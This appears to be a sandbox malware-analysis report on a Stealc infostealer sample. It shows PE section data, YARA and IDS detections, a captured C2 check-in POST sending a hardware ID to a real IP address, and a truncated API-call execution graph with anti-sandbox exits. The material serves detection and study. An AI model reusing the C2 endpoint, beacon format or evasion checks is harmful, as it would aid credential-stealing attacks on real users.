                                • [C++] VS2010 build 30319
                                • [ASM] VS2010 build 30319
                                • [ C ] VS2010 build 30319
                                • [ C ] VS2008 SP1 build 30729
                                • [IMP] VS2008 SP1 build 30729
                                • [LNK] VS2010 build 30319

                                Data Directories

                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0x2e90500x64.idata
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x2e91f80x8.idata
                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                Sections

                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                0x10000x2e70000x6760025dd4da1d7f8149948dea8d367c2405funknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .rsrc 0x2e80000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .idata 0x2e90000x10000x200049071433b9f7c843453337b0fd53002False0.1328125data0.8946074494647072IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                0x2ea0000x2930000x200f0329b65f021e05372719b90c77ef9d0unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                fvvfrivq0x57d0000x1950000x194400294176fbe60172a9835ca56b7313ff57False0.9949130575525664data7.9536048042194505IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                fjsconsa0x7120000x10000x60047731b5350d27b88bd414222d3dcf93bFalse0.5852864583333334data5.100438224541122IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .taggant0x7130000x30000x2200347fee62de20c458585ee27470a327ceFalse0.062270220588235295DOS executable (COM)0.8132786838728902IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                Imports

                                DLLImport
                                kernel32.dlllstrcpy

                                Network Behavior

                                Suricata IDS Alerts

                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                2024-10-29T22:13:18.983215+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.549704185.215.113.20680TCP

                                Network Port Distribution

                                TCP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Oct 29, 2024 22:13:17.748547077 CET4970480192.168.2.5185.215.113.206
                                Oct 29, 2024 22:13:17.754158974 CET8049704185.215.113.206192.168.2.5
                                Oct 29, 2024 22:13:17.754235983 CET4970480192.168.2.5185.215.113.206
                                Oct 29, 2024 22:13:17.754535913 CET4970480192.168.2.5185.215.113.206
                                Oct 29, 2024 22:13:17.760410070 CET8049704185.215.113.206192.168.2.5
                                Oct 29, 2024 22:13:18.686731100 CET8049704185.215.113.206192.168.2.5
                                Oct 29, 2024 22:13:18.686932087 CET4970480192.168.2.5185.215.113.206
                                Oct 29, 2024 22:13:18.691016912 CET4970480192.168.2.5185.215.113.206
                                Oct 29, 2024 22:13:18.696372032 CET8049704185.215.113.206192.168.2.5
                                Oct 29, 2024 22:13:18.983040094 CET8049704185.215.113.206192.168.2.5
                                Oct 29, 2024 22:13:18.983215094 CET4970480192.168.2.5185.215.113.206
                                Oct 29, 2024 22:13:21.172844887 CET4970480192.168.2.5185.215.113.206

                                HTTP Request Dependency Graph

                                • 185.215.113.206

                                HTTP Packets

                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.549704185.215.113.206806644C:\Users\user\Desktop\file.exe
                                TimestampBytes transferredDirectionData
                                Oct 29, 2024 22:13:17.754535913 CET90OUTGET / HTTP/1.1
                                Host: 185.215.113.206
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                Oct 29, 2024 22:13:18.686731100 CET203INHTTP/1.1 200 OK
                                Date: Tue, 29 Oct 2024 21:13:18 GMT
                                Server: Apache/2.4.41 (Ubuntu)
                                Content-Length: 0
                                Keep-Alive: timeout=5, max=100
                                Connection: Keep-Alive
                                Content-Type: text/html; charset=UTF-8
                                Oct 29, 2024 22:13:18.691016912 CET413OUTPOST /6c4adf523b719729.php HTTP/1.1
                                Content-Type: multipart/form-data; boundary=----FHCGCFHDHIIIDGCAAEGD
                                Host: 185.215.113.206
                                Content-Length: 211
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                Data Raw: 2d 2d 2d 2d 2d 2d 46 48 43 47 43 46 48 44 48 49 49 49 44 47 43 41 41 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 42 42 42 35 43 31 32 46 35 37 35 33 37 39 39 36 32 31 31 36 35 0d 0a 2d 2d 2d 2d 2d 2d 46 48 43 47 43 46 48 44 48 49 49 49 44 47 43 41 41 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 46 48 43 47 43 46 48 44 48 49 49 49 44 47 43 41 41 45 47 44 2d 2d 0d 0a
                                Data Ascii: ------FHCGCFHDHIIIDGCAAEGDContent-Disposition: form-data; name="hwid"6BBB5C12F5753799621165------FHCGCFHDHIIIDGCAAEGDContent-Disposition: form-data; name="build"tale------FHCGCFHDHIIIDGCAAEGD--
                                Oct 29, 2024 22:13:18.983040094 CET210INHTTP/1.1 200 OK
                                Date: Tue, 29 Oct 2024 21:13:18 GMT
                                Server: Apache/2.4.41 (Ubuntu)
                                Content-Length: 8
                                Keep-Alive: timeout=5, max=99
                                Connection: Keep-Alive
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 59 6d 78 76 59 32 73 3d
                                Data Ascii: YmxvY2s=


                                Statistics

                                CPU Usage

                                Click to jump to process

                                Memory Usage

                                Click to jump to process

                                High Level Behavior Distribution

                                Click to dive into process behavior distribution

                                System Behavior

                                General

                                Target ID:0
                                Start time:17:13:13
                                Start date:29/10/2024
                                Path:C:\Users\user\Desktop\file.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\file.exe"
                                Imagebase:0xba0000
                                File size:2'094'592 bytes
                                MD5 hash:31C844530D857C4266248543C40284CC
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2131533461.00000000052D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2176326944.00000000012EE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:low
                                Has exited:true

                                Disassembly

                                Reset < >

                                  Execution Graph

                                  Execution Coverage:3.1%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:3.5%
                                  Total number of Nodes:1327
                                  Total number of Limit Nodes:24
                                  execution_graph 37768 bb6c90 37813 ba22a0 37768->37813 37792 bb6d04 37793 bbacc0 4 API calls 37792->37793 37794 bb6d0b 37793->37794 37795 bbacc0 4 API calls 37794->37795 37796 bb6d12 37795->37796 37797 bbacc0 4 API calls 37796->37797 37798 bb6d19 37797->37798 37799 bbacc0 4 API calls 37798->37799 37800 bb6d20 37799->37800 37965 bbabb0 37800->37965 37802 bb6d29 37803 bb6dac 37802->37803 37806 bb6d62 OpenEventA 37802->37806 37969 bb6bc0 GetSystemTime 37803->37969 37808 bb6d79 37806->37808 37809 bb6d95 CloseHandle Sleep 37806->37809 37812 bb6d81 CreateEventA 37808->37812 37811 bb6daa 37809->37811 37810 bb6db6 CloseHandle ExitProcess 37811->37802 37812->37803 38166 ba4610 37813->38166 37815 ba22b4 37816 ba4610 2 API calls 37815->37816 37817 ba22cd 37816->37817 37818 ba4610 2 API calls 37817->37818 37819 ba22e6 37818->37819 37820 ba4610 2 API calls 37819->37820 37821 ba22ff 37820->37821 37822 ba4610 2 API calls 37821->37822 37823 ba2318 37822->37823 37824 ba4610 2 API calls 37823->37824 37825 ba2331 37824->37825 37826 ba4610 2 API calls 37825->37826 37827 ba234a 37826->37827 37828 ba4610 2 API calls 37827->37828 37829 ba2363 37828->37829 37830 ba4610 2 API calls 37829->37830 37831 ba237c 37830->37831 37832 ba4610 2 API calls 37831->37832 37833 ba2395 37832->37833 37834 ba4610 2 API calls 37833->37834 37835 ba23ae 37834->37835 37836 ba4610 2 API calls 37835->37836 37837 ba23c7 37836->37837 37838 ba4610 2 API calls 37837->37838 37839 ba23e0 37838->37839 37840 ba4610 2 API calls 37839->37840 37841 ba23f9 37840->37841 37842 ba4610 2 API calls 37841->37842 37843 ba2412 37842->37843 37844 ba4610 2 API calls 37843->37844 37845 ba242b 37844->37845 37846 ba4610 2 API calls 37845->37846 37847 ba2444 37846->37847 37848 ba4610 2 API calls 37847->37848 37849 ba245d 37848->37849 37850 ba4610 2 API calls 37849->37850 37851 ba2476 37850->37851 37852 ba4610 2 API calls 37851->37852 37853 ba248f 37852->37853 37854 ba4610 2 API calls 37853->37854 37855 ba24a8 37854->37855 37856 ba4610 2 API calls 37855->37856 37857 ba24c1 37856->37857 37858 ba4610 2 API calls 37857->37858 37859 ba24da 37858->37859 37860 ba4610 2 API calls 37859->37860 37861 ba24f3 37860->37861 37862 ba4610 2 API calls 37861->37862 37863 ba250c 37862->37863 37864 ba4610 2 API calls 37863->37864 37865 ba2525 37864->37865 37866 ba4610 2 API calls 37865->37866 37867 ba253e 37866->37867 37868 ba4610 2 API calls 37867->37868 37869 ba2557 37868->37869 37870 ba4610 2 API calls 37869->37870 37871 ba2570 37870->37871 37872 ba4610 2 API calls 37871->37872 37873 ba2589 37872->37873 37874 ba4610 2 API calls 37873->37874 37875 ba25a2 37874->37875 37876 ba4610 2 API calls 37875->37876 37877 ba25bb 37876->37877 37878 ba4610 2 API calls 37877->37878 37879 ba25d4 37878->37879 37880 ba4610 2 API calls 37879->37880 37881 ba25ed 37880->37881 37882 ba4610 2 API calls 37881->37882 37883 ba2606 37882->37883 37884 ba4610 2 API calls 37883->37884 37885 ba261f 37884->37885 37886 ba4610 2 API calls 37885->37886 37887 ba2638 37886->37887 37888 ba4610 2 API calls 37887->37888 37889 ba2651 37888->37889 37890 ba4610 2 API calls 37889->37890 37891 ba266a 37890->37891 37892 ba4610 2 API calls 37891->37892 37893 ba2683 37892->37893 37894 ba4610 2 API calls 37893->37894 37895 ba269c 37894->37895 37896 ba4610 2 API calls 37895->37896 37897 ba26b5 37896->37897 37898 ba4610 2 API calls 37897->37898 37899 ba26ce 37898->37899 37900 bb9bb0 37899->37900 38171 bb9aa0 GetPEB 37900->38171 37902 bb9bb8 37903 bb9bca 37902->37903 37904 bb9de3 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 37902->37904 37909 bb9bdc 21 API calls 37903->37909 37905 bb9e5d 37904->37905 37906 bb9e44 GetProcAddress 37904->37906 37907 bb9e96 37905->37907 37908 bb9e66 GetProcAddress GetProcAddress 37905->37908 37906->37905 37910 bb9eb8 37907->37910 37911 bb9e9f GetProcAddress 37907->37911 37908->37907 37909->37904 37912 bb9ed9 37910->37912 37913 bb9ec1 GetProcAddress 37910->37913 37911->37910 37914 bb9ee2 GetProcAddress GetProcAddress 37912->37914 37915 bb6ca0 37912->37915 37913->37912 37914->37915 37916 bbaa50 37915->37916 37917 bbaa60 37916->37917 37918 bb6cad 37917->37918 37919 bbaa8e lstrcpy 37917->37919 37920 ba11d0 37918->37920 37919->37918 37921 ba11e8 37920->37921 37922 ba120f ExitProcess 37921->37922 37923 ba1217 37921->37923 37924 ba1160 GetSystemInfo 37923->37924 37925 ba117c ExitProcess 37924->37925 37926 ba1184 37924->37926 37927 ba1110 GetCurrentProcess VirtualAllocExNuma 37926->37927 37928 ba1149 37927->37928 37929 ba1141 ExitProcess 37927->37929 38172 ba10a0 VirtualAlloc 37928->38172 37932 ba1220 38176 bb8b40 37932->38176 37935 ba1249 __aulldiv 37936 ba129a 37935->37936 37937 ba1292 ExitProcess 37935->37937 37938 bb6a10 GetUserDefaultLangID 37936->37938 37939 bb6a73 37938->37939 37940 bb6a32 37938->37940 37946 ba1190 37939->37946 37940->37939 37941 bb6a6b ExitProcess 37940->37941 37942 bb6a4d ExitProcess 37940->37942 37943 bb6a43 ExitProcess 37940->37943 37944 bb6a61 ExitProcess 37940->37944 37945 bb6a57 ExitProcess 37940->37945 37947 bb7a70 3 API calls 37946->37947 37948 ba119e 37947->37948 37949 ba11cc 37948->37949 37950 bb79e0 3 API calls 37948->37950 37953 bb79e0 GetProcessHeap RtlAllocateHeap GetUserNameA 37949->37953 37951 ba11b7 37950->37951 37951->37949 37952 ba11c4 ExitProcess 37951->37952 37954 bb6cd0 37953->37954 37955 bb7a70 GetProcessHeap RtlAllocateHeap GetComputerNameA 37954->37955 37956 bb6ce3 37955->37956 37957 bbacc0 37956->37957 38178 bbaa20 37957->38178 37959 bbacd1 lstrlen 37961 bbacf0 37959->37961 37960 bbad28 38179 bbaab0 37960->38179 37961->37960 37963 bbad0a lstrcpy lstrcat 37961->37963 37963->37960 37964 bbad34 37964->37792 37966 bbabcb 37965->37966 37967 bbac1b 37966->37967 37968 bbac09 lstrcpy 37966->37968 37967->37802 37968->37967 38183 bb6ac0 37969->38183 37971 bb6c2e 37972 bb6c38 sscanf 37971->37972 38212 bbab10 37972->38212 37974 bb6c4a SystemTimeToFileTime SystemTimeToFileTime 37975 bb6c6e 37974->37975 37976 bb6c80 37974->37976 37975->37976 37977 bb6c78 ExitProcess 37975->37977 37978 bb5d60 37976->37978 37979 bb5d6d 37978->37979 37980 bbaa50 lstrcpy 37979->37980 37981 bb5d7e 37980->37981 38214 bbab30 lstrlen 37981->38214 37984 bbab30 2 API calls 37985 bb5db4 37984->37985 37986 bbab30 2 API calls 37985->37986 37987 bb5dc4 37986->37987 38218 bb6680 37987->38218 37990 bbab30 2 API calls 37991 bb5de3 37990->37991 37992 bbab30 2 API calls 37991->37992 37993 bb5df0 37992->37993 37994 bbab30 2 API calls 37993->37994 37995 bb5dfd 37994->37995 37996 bbab30 2 API calls 37995->37996 37997 bb5e49 37996->37997 38227 ba26f0 37997->38227 38005 bb5f13 38006 bb6680 lstrcpy 38005->38006 38007 bb5f25 38006->38007 38008 bbaab0 lstrcpy 38007->38008 38009 bb5f42 38008->38009 38010 bbacc0 4 API calls 38009->38010 38011 bb5f5a 38010->38011 38012 bbabb0 lstrcpy 38011->38012 38013 bb5f66 38012->38013 38014 bbacc0 4 API calls 38013->38014 38015 bb5f8a 38014->38015 38016 bbabb0 lstrcpy 38015->38016 38017 bb5f96 38016->38017 38018 bbacc0 4 API calls 38017->38018 38019 bb5fba 38018->38019 38020 bbabb0 lstrcpy 38019->38020 38021 bb5fc6 38020->38021 38022 bbaa50 lstrcpy 38021->38022 38023 bb5fee 38022->38023 38953 bb7690 GetWindowsDirectoryA 38023->38953 38026 bbaab0 lstrcpy 38027 bb6008 38026->38027 38963 ba48d0 38027->38963 38029 bb600e 39108 bb19f0 38029->39108 38031 bb6016 38032 bbaa50 lstrcpy 38031->38032 38033 bb6039 38032->38033 38034 ba1590 lstrcpy 38033->38034 38035 bb604d 38034->38035 39124 ba59b0 34 API calls codecvt 38035->39124 38037 bb6053 39125 bb1280 lstrlen lstrcpy 38037->39125 38039 bb605e 38040 bbaa50 lstrcpy 38039->38040 38041 bb6082 38040->38041 38042 ba1590 lstrcpy 38041->38042 38043 bb6096 38042->38043 39126 ba59b0 34 API calls codecvt 38043->39126 38045 bb609c 39127 bb0fc0 StrCmpCA StrCmpCA StrCmpCA lstrlen lstrcpy 38045->39127 38047 bb60a7 38048 bbaa50 lstrcpy 38047->38048 38049 bb60c9 38048->38049 38050 ba1590 lstrcpy 38049->38050 38051 bb60dd 38050->38051 39128 ba59b0 34 API calls codecvt 38051->39128 38053 bb60e3 39129 bb1170 StrCmpCA lstrlen lstrcpy 38053->39129 38055 bb60ee 38056 ba1590 lstrcpy 38055->38056 38057 bb6105 38056->38057 39130 bb1c60 115 API calls 38057->39130 38059 bb610a 38060 bbaa50 lstrcpy 38059->38060 38061 bb6126 38060->38061 39131 ba5000 7 API calls 38061->39131 38063 bb612b 38064 ba1590 lstrcpy 38063->38064 38065 bb61ab 38064->38065 39132 bb08a0 285 API calls 38065->39132 38067 bb61b0 38068 bbaa50 lstrcpy 38067->38068 38069 bb61d6 38068->38069 38070 ba1590 lstrcpy 38069->38070 38071 bb61ea 38070->38071 39133 ba59b0 34 API calls codecvt 38071->39133 38073 bb61f0 39134 bb13c0 StrCmpCA lstrlen lstrcpy 38073->39134 38075 bb61fb 38076 ba1590 lstrcpy 38075->38076 38077 bb623b 38076->38077 39135 ba1ec0 59 API calls 38077->39135 38079 bb6240 38080 bb62e2 38079->38080 38081 bb6250 38079->38081 38082 bbaab0 lstrcpy 38080->38082 38083 bbaa50 lstrcpy 38081->38083 38084 bb62f5 38082->38084 38085 bb6270 38083->38085 38086 ba1590 lstrcpy 38084->38086 38087 ba1590 lstrcpy 38085->38087 38088 bb6309 38086->38088 38089 bb6284 38087->38089 39139 ba59b0 34 API calls codecvt 38088->39139 39136 ba59b0 34 API calls codecvt 38089->39136 38092 bb628a 39137 bb1520 19 API calls codecvt 38092->39137 38093 bb630f 39140 bb37b0 31 API calls 38093->39140 38096 bb6295 38098 ba1590 lstrcpy 38096->38098 38097 bb62da 38099 bb635b 38097->38099 38101 ba1590 lstrcpy 38097->38101 38100 bb62d5 38098->38100 38103 bb6380 38099->38103 38106 ba1590 lstrcpy 38099->38106 39138 bb4010 67 API calls 38100->39138 38105 bb6337 38101->38105 38104 bb63a5 38103->38104 38107 ba1590 lstrcpy 38103->38107 38109 bb63ca 38104->38109 38113 ba1590 lstrcpy 38104->38113 39141 bb4300 57 API calls 2 library calls 38105->39141 38110 bb637b 38106->38110 38111 bb63a0 38107->38111 38114 bb63ef 38109->38114 38120 ba1590 lstrcpy 38109->38120 39143 bb49d0 88 API calls codecvt 38110->39143 39144 bb4e00 61 API calls codecvt 38111->39144 38112 bb633c 38118 ba1590 lstrcpy 38112->38118 38119 bb63c5 38113->38119 38116 bb6414 38114->38116 38121 ba1590 lstrcpy 38114->38121 38123 bb6439 38116->38123 38129 ba1590 lstrcpy 38116->38129 38122 bb6356 38118->38122 39145 bb4fc0 65 API calls 38119->39145 38125 bb63ea 38120->38125 38127 bb640f 38121->38127 39142 bb5350 44 API calls 38122->39142 38130 bb6460 38123->38130 38131 ba1590 lstrcpy 38123->38131 39146 bb5190 63 API calls codecvt 38125->39146 39147 ba7770 107 API calls codecvt 38127->39147 38135 bb6434 38129->38135 38132 bb6503 38130->38132 38133 bb6470 38130->38133 38136 bb6459 38131->38136 38137 bbaab0 lstrcpy 38132->38137 38138 bbaa50 lstrcpy 38133->38138 39148 bb52a0 61 API calls codecvt 38135->39148 39149 bb91a0 46 API calls codecvt 38136->39149 38141 bb6516 38137->38141 38142 bb6491 38138->38142 38143 ba1590 lstrcpy 38141->38143 38144 ba1590 lstrcpy 38142->38144 38145 bb652a 38143->38145 38146 bb64a5 38144->38146 39153 ba59b0 34 API calls codecvt 38145->39153 39150 ba59b0 34 API calls codecvt 38146->39150 38149 bb6530 39154 bb37b0 31 API calls 38149->39154 38150 bb64ab 39151 bb1520 19 API calls codecvt 38150->39151 38153 bb64fb 38156 bbaab0 lstrcpy 38153->38156 38154 bb64b6 38155 ba1590 lstrcpy 38154->38155 38157 bb64f6 38155->38157 38159 bb654c 38156->38159 39152 bb4010 67 API calls 38157->39152 38160 ba1590 lstrcpy 38159->38160 38161 bb6560 38160->38161 39155 ba59b0 34 API calls codecvt 38161->39155 38163 bb656c 38165 bb6588 38163->38165 39156 bb68d0 9 API calls codecvt 38163->39156 38165->37810 38167 ba4621 RtlAllocateHeap 38166->38167 38170 ba4671 VirtualProtect 38167->38170 38170->37815 38171->37902 38174 ba10c2 codecvt 38172->38174 38173 ba10fd 38173->37932 38174->38173 38175 ba10e2 VirtualFree 38174->38175 38175->38173 38177 ba1233 GlobalMemoryStatusEx 38176->38177 38177->37935 38178->37959 38180 bbaad2 38179->38180 38181 bbaafc 38180->38181 38182 bbaaea lstrcpy 38180->38182 38181->37964 38182->38181 38184 bbaa50 lstrcpy 38183->38184 38185 bb6ad3 38184->38185 38186 bbacc0 4 API calls 38185->38186 38187 bb6ae5 38186->38187 38188 bbabb0 lstrcpy 38187->38188 38189 bb6aee 38188->38189 38190 bbacc0 4 API calls 38189->38190 38191 bb6b07 38190->38191 38192 bbabb0 lstrcpy 38191->38192 38193 bb6b10 38192->38193 38194 bbacc0 4 API calls 38193->38194 38195 bb6b2a 38194->38195 38196 bbabb0 lstrcpy 38195->38196 38197 bb6b33 38196->38197 38198 bbacc0 4 API calls 38197->38198 38199 bb6b4c 38198->38199 38200 bbabb0 lstrcpy 38199->38200 38201 bb6b55 38200->38201 38202 bbacc0 4 API calls 38201->38202 38203 bb6b6f 38202->38203 38204 bbabb0 lstrcpy 38203->38204 38205 bb6b78 38204->38205 38206 bbacc0 4 API calls 38205->38206 38207 bb6b93 38206->38207 38208 bbabb0 lstrcpy 38207->38208 38209 bb6b9c 38208->38209 38210 bbaab0 lstrcpy 38209->38210 38211 bb6bb0 38210->38211 38211->37971 38213 bbab22 38212->38213 38213->37974 38215 bbab4f 38214->38215 38216 bb5da4 38215->38216 38217 bbab8b lstrcpy 38215->38217 38216->37984 38217->38216 38219 bbabb0 lstrcpy 38218->38219 38220 bb6693 38219->38220 38221 bbabb0 lstrcpy 38220->38221 38222 bb66a5 38221->38222 38223 bbabb0 lstrcpy 38222->38223 38224 bb66b7 38223->38224 38225 bbabb0 lstrcpy 38224->38225 38226 bb5dd6 38225->38226 38226->37990 38228 ba4610 2 API calls 38227->38228 38229 ba2704 38228->38229 38230 ba4610 2 API calls 38229->38230 38231 ba2727 38230->38231 38232 ba4610 2 API calls 38231->38232 38233 ba2740 38232->38233 38234 ba4610 2 API calls 38233->38234 38235 ba2759 38234->38235 38236 ba4610 2 API calls 38235->38236 38237 ba2786 38236->38237 38238 ba4610 2 API calls 38237->38238 38239 ba279f 38238->38239 38240 ba4610 2 API calls 38239->38240 38241 ba27b8 38240->38241 38242 ba4610 2 API calls 38241->38242 38243 ba27e5 38242->38243 38244 ba4610 2 API calls 38243->38244 38245 ba27fe 38244->38245 38246 ba4610 2 API calls 38245->38246 38247 ba2817 38246->38247 38248 ba4610 2 API calls 38247->38248 38249 ba2830 38248->38249 38250 ba4610 2 API calls 38249->38250 38251 ba2849 38250->38251 38252 ba4610 2 API calls 38251->38252 38253 ba2862 38252->38253 38254 ba4610 2 API calls 38253->38254 38255 ba287b 38254->38255 38256 ba4610 2 API calls 38255->38256 38257 ba2894 38256->38257 38258 ba4610 2 API calls 38257->38258 38259 ba28ad 38258->38259 38260 ba4610 2 API calls 38259->38260 38261 ba28c6 38260->38261 38262 ba4610 2 API calls 38261->38262 38263 ba28df 38262->38263 38264 ba4610 2 API calls 38263->38264 38265 ba28f8 38264->38265 38266 ba4610 2 API calls 38265->38266 38267 ba2911 38266->38267 38268 ba4610 2 API calls 38267->38268 38269 ba292a 38268->38269 38270 ba4610 2 API calls 38269->38270 38271 ba2943 38270->38271 38272 ba4610 2 API calls 38271->38272 38273 ba295c 38272->38273 38274 ba4610 2 API calls 38273->38274 38275 ba2975 38274->38275 38276 ba4610 2 API calls 38275->38276 38277 ba298e 38276->38277 38278 ba4610 2 API calls 38277->38278 38279 ba29a7 38278->38279 38280 ba4610 2 API calls 38279->38280 38281 ba29c0 38280->38281 38282 ba4610 2 API calls 38281->38282 38283 ba29d9 38282->38283 38284 ba4610 2 API calls 38283->38284 38285 ba29f2 38284->38285 38286 ba4610 2 API calls 38285->38286 38287 ba2a0b 38286->38287 38288 ba4610 2 API calls 38287->38288 38289 ba2a24 38288->38289 38290 ba4610 2 API calls 38289->38290 38291 ba2a3d 38290->38291 38292 ba4610 2 API calls 38291->38292 38293 ba2a56 38292->38293 38294 ba4610 2 API calls 38293->38294 38295 ba2a6f 38294->38295 38296 ba4610 2 API calls 38295->38296 38297 ba2a88 38296->38297 38298 ba4610 2 API calls 38297->38298 38299 ba2aa1 38298->38299 38300 ba4610 2 API calls 38299->38300 38301 ba2aba 38300->38301 38302 ba4610 2 API calls 38301->38302 38303 ba2ad3 38302->38303 38304 ba4610 2 API calls 38303->38304 38305 ba2aec 38304->38305 38306 ba4610 2 API calls 38305->38306 38307 ba2b05 38306->38307 38308 ba4610 2 API calls 38307->38308 38309 ba2b1e 38308->38309 38310 ba4610 2 API calls 38309->38310 38311 ba2b37 38310->38311 38312 ba4610 2 API calls 38311->38312 38313 ba2b50 38312->38313 38314 ba4610 2 API calls 38313->38314 38315 ba2b69 38314->38315 38316 ba4610 2 API calls 38315->38316 38317 ba2b82 38316->38317 38318 ba4610 2 API calls 38317->38318 38319 ba2b9b 38318->38319 38320 ba4610 2 API calls 38319->38320 38321 ba2bb4 38320->38321 38322 ba4610 2 API calls 38321->38322 38323 ba2bcd 38322->38323 38324 ba4610 2 API calls 38323->38324 38325 ba2be6 38324->38325 38326 ba4610 2 API calls 38325->38326 38327 ba2bff 38326->38327 38328 ba4610 2 API calls 38327->38328 38329 ba2c18 38328->38329 38330 ba4610 2 API calls 38329->38330 38331 ba2c31 38330->38331 38332 ba4610 2 API calls 38331->38332 38333 ba2c4a 38332->38333 38334 ba4610 2 API calls 38333->38334 38335 ba2c63 38334->38335 38336 ba4610 2 API calls 38335->38336 38337 ba2c7c 38336->38337 38338 ba4610 2 API calls 38337->38338 38339 ba2c95 38338->38339 38340 ba4610 2 API calls 38339->38340 38341 ba2cae 38340->38341 38342 ba4610 2 API calls 38341->38342 38343 ba2cc7 38342->38343 38344 ba4610 2 API calls 38343->38344 38345 ba2ce0 38344->38345 38346 ba4610 2 API calls 38345->38346 38347 ba2cf9 38346->38347 38348 ba4610 2 API calls 38347->38348 38349 ba2d12 38348->38349 38350 ba4610 2 API calls 38349->38350 38351 ba2d2b 38350->38351 38352 ba4610 2 API calls 38351->38352 38353 ba2d44 38352->38353 38354 ba4610 2 API calls 38353->38354 38355 ba2d5d 38354->38355 38356 ba4610 2 API calls 38355->38356 38357 ba2d76 38356->38357 38358 ba4610 2 API calls 38357->38358 38359 ba2d8f 38358->38359 38360 ba4610 2 API calls 38359->38360 38361 ba2da8 38360->38361 38362 ba4610 2 API calls 38361->38362 38363 ba2dc1 38362->38363 38364 ba4610 2 API calls 38363->38364 38365 ba2dda 38364->38365 38366 ba4610 2 API calls 38365->38366 38367 ba2df3 38366->38367 38368 ba4610 2 API calls 38367->38368 38369 ba2e0c 38368->38369 38370 ba4610 2 API calls 38369->38370 38371 ba2e25 38370->38371 38372 ba4610 2 API calls 38371->38372 38373 ba2e3e 38372->38373 38374 ba4610 2 API calls 38373->38374 38375 ba2e57 38374->38375 38376 ba4610 2 API calls 38375->38376 38377 ba2e70 38376->38377 38378 ba4610 2 API calls 38377->38378 38379 ba2e89 38378->38379 38380 ba4610 2 API calls 38379->38380 38381 ba2ea2 38380->38381 38382 ba4610 2 API calls 38381->38382 38383 ba2ebb 38382->38383 38384 ba4610 2 API calls 38383->38384 38385 ba2ed4 38384->38385 38386 ba4610 2 API calls 38385->38386 38387 ba2eed 38386->38387 38388 ba4610 2 API calls 38387->38388 38389 ba2f06 38388->38389 38390 ba4610 2 API calls 38389->38390 38391 ba2f1f 38390->38391 38392 ba4610 2 API calls 38391->38392 38393 ba2f38 38392->38393 38394 ba4610 2 API calls 38393->38394 38395 ba2f51 38394->38395 38396 ba4610 2 API calls 38395->38396 38397 ba2f6a 38396->38397 38398 ba4610 2 API calls 38397->38398 38399 ba2f83 38398->38399 38400 ba4610 2 API calls 38399->38400 38401 ba2f9c 38400->38401 38402 ba4610 2 API calls 38401->38402 